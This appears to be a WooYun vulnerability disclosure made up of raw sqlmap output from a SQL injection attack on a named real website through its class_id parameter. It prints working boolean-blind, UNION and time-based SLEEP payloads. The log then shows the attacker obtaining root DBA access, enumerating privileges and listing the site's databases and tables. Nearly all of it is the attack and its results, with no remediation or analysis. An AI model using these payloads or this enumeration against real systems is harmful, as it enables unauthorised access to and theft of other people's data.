WooYun.org

---
Place: GET
Parameter: class_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class_id=80' AND 6332=6332 AND 'UMJp'='UMJp
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: class_id=80' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6
b676a3a,0x474f5a426b46456a6745,0x3a716b733a),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: class_id=80' AND SLEEP(5) AND 'fHfq'='fHfq
---
[11:57:58] [INFO] testing MySQL
[11:57:58] [INFO] confirming MySQL
[11:57:58] [WARNING] reflective value(s) found and filtering out
[11:57:58] [INFO] the back-end DBMS is MySQL
[11:57:58] [INFO] fetching banner
[11:57:58] [INFO] actively fingerprinting MySQL
[11:57:58] [INFO] executing MySQL comment injection fingerprint
[11:57:59] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[11:57:59] [WARNING] unable to perform MySQL comment injection
web application technology: JSP
back-end DBMS: active fingerprint: MySQL >= 5.5.0
banner:    '5.5.17'
[11:57:59] [INFO] fetching current user
current user:    'root@localhost'
[11:57:59] [INFO] fetching current database
current database:    'scfae'
[11:57:59] [INFO] testing if current user is DBA
[11:57:59] [INFO] fetching current user
current user is DBA:    True
[11:58:00] [INFO] fetching database users
database management system users [19]:
[*] 'root'@'localhost'
[11:58:00] [INFO] fetching database users privileges
database management system users privileges:
[*] 'root'@'localhost' (administrator) [19]:
    privilege: ALTER
    privilege: CREATE
    privilege: CREATE TEMPORARY TABLES
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: UPDATE
[11:58:00] [WARNING] on MySQL the concept of roles does not exist. sqlmap will e
numerate privileges instead
[11:58:00] [INFO] fetching database users privileges
database management system users roles:
[*] 'root'@'localhost' (administrator) [38]:
    role: ALTER
    role: ALTER
    role: CREATE
    role: CREATE
    role: CREATE TEMPORARY TABLES
    role: CREATE TEMPORARY TABLES
    role: DELETE
    role: DELETE
    role: DROP
    role: DROP
    role: EXECUTE
    role: EXECUTE
    role: FILE
    role: FILE
    role: INDEX
    role: INDEX
    role: INSERT
    role: INSERT
    role: LOCK TABLES
    role: LOCK TABLES
    role: PROCESS
    role: PROCESS
    role: REFERENCES
    role: REFERENCES
    role: RELOAD
    role: RELOAD
    role: REPLICATION SLAVE
    role: REPLICATION SLAVE
    role: SELECT
    role: SELECT
    role: SHOW DATABASES
    role: SHOW DATABASES
    role: SHUTDOWN
    role: SHUTDOWN
    role: SUPER
    role: SUPER
    role: UPDATE
    role: UPDATE
[11:58:01] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] scfae
[*] test
[11:58:01] [INFO] fetching tables for databases: 'information_schema, mysql, per
formance_schema, scfae, test'
Database: information_schema
[19 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
+---------------------------------------+
[11:58:01] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) columns
[11:58:01] [INFO] fetching current database
[11:58:01] [INFO] fetching columns for table 'CHARACTER_SETS' in database 'scfae
'
[11:58:02] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[11:58:02] [INFO] retrieved:
[11:58:02] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[11:58:03] [INFO] retrieved:
[11:58:05] [INFO] fetching columns for table 'COLLATIONS' in database 'scfae'
[11:58:05] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[11:58:05] [INFO] retrieved:
[11:58:06] [INFO] retrieved:
[11:58:08] [INFO] fetching columns for table 'COLLATION_CHARACTER_SET_APPLICABIL
ITY' in database 'scfae'
[11:58:08] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[11:58:08] [INFO] retrieved:
[11:58:10] [INFO] retrieved:
[11:58:11] [INFO] fetching columns for table 'COLUMNS' in database 'scfae'
[11:58:12] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[11:58:12] [INFO] retrieved:
[11:58:13] [INFO] retrieved:
[11:58:15] [INFO] fetching columns for table 'COLUMN_PRIVILEGES' in database 'sc
fae'
[11:58:15] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[11:58:15] [INFO] retrieved:
[11:58:17] [INFO] retrieved:
[11:58:18] [INFO] fetching columns for table 'ENGINES' in database 'scfae'
[11:58:18] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
A
[12:11:00] [INFO] retrieved:
[12:11:01] [INFO] fetching columns for table 'EVENTS' in database 'scfae'
[12:11:01] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:01] [INFO] retrieved:
[12:11:03] [INFO] retrieved:
[12:11:04] [INFO] fetching columns for table 'FILES' in database 'scfae'
[12:11:05] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:05] [INFO] retrieved:
[12:11:06] [INFO] retrieved:
[12:11:08] [INFO] fetching columns for table 'GLOBAL_STATUS' in database 'scfae'
[12:11:08] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:08] [INFO] retrieved:
[12:11:10] [INFO] retrieved:
[12:11:11] [INFO] fetching columns for table 'GLOBAL_VARIABLES' in database 'scf
ae'
[12:11:12] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:12] [INFO] retrieved:
[12:11:13] [INFO] retrieved:
[12:11:15] [INFO] fetching columns for table 'KEY_COLUMN_USAGE' in database 'scf
ae'
[12:11:15] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:15] [INFO] retrieved:
[12:11:16] [INFO] retrieved:
[12:11:18] [INFO] fetching columns for table 'PARAMETERS' in database 'scfae'
[12:11:18] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:18] [INFO] retrieved:
[12:11:20] [INFO] retrieved:
[12:11:21] [INFO] fetching columns for table 'PARTITIONS' in database 'scfae'
[12:11:22] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:22] [INFO] retrieved:
[12:11:23] [INFO] retrieved:
[12:11:25] [INFO] fetching columns for table 'PLUGINS' in database 'scfae'
[12:11:25] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:25] [INFO] retrieved:
[12:11:27] [INFO] retrieved:
[12:11:28] [INFO] fetching columns for table 'PROCESSLIST' in database 'scfae'
[12:11:29] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:29] [INFO] retrieved:
[12:11:30] [INFO] retrieved:
[12:11:32] [INFO] fetching columns for table 'PROFILING' in database 'scfae'
[12:11:32] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:32] [INFO] retrieved:
[12:11:33] [INFO] retrieved:
[12:11:35] [INFO] fetching columns for table 'REFERENTIAL_CONSTRAINTS' in databa
se 'scfae'
[12:11:36] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:36] [INFO] retrieved:
[12:11:37] [INFO] retrieved:
[12:11:39] [INFO] fetching columns for table 'ROUTINES' in database 'scfae'
[12:11:39] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:39] [INFO] retrieved:
[12:11:41] [INFO] retrieved:
[12:11:42] [INFO] fetching columns for table 'SCHEMATA' in database 'scfae'
[12:11:42] [INFO] the SQL query provided has more than one field. sqlmap will no
w unpack it into distinct queries to be able to retrieve the output even if we a
re going blind
[12:11:42] [INFO] retrieved:
[12:11:44] [INFO] retrieved:
Database: scfae
Table: ENGINES
[2 columns]
+--------+------+
| Column | Type |
+--------+------+
| `,`    |      |
| A      |      |
+--------+------+
[12:11:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[12:11:46] [INFO] fetched data logged to text files under 'c:\Python27\sqlmap\ou
tput\www.scfae.com'
[*] shutting down at 12:11:46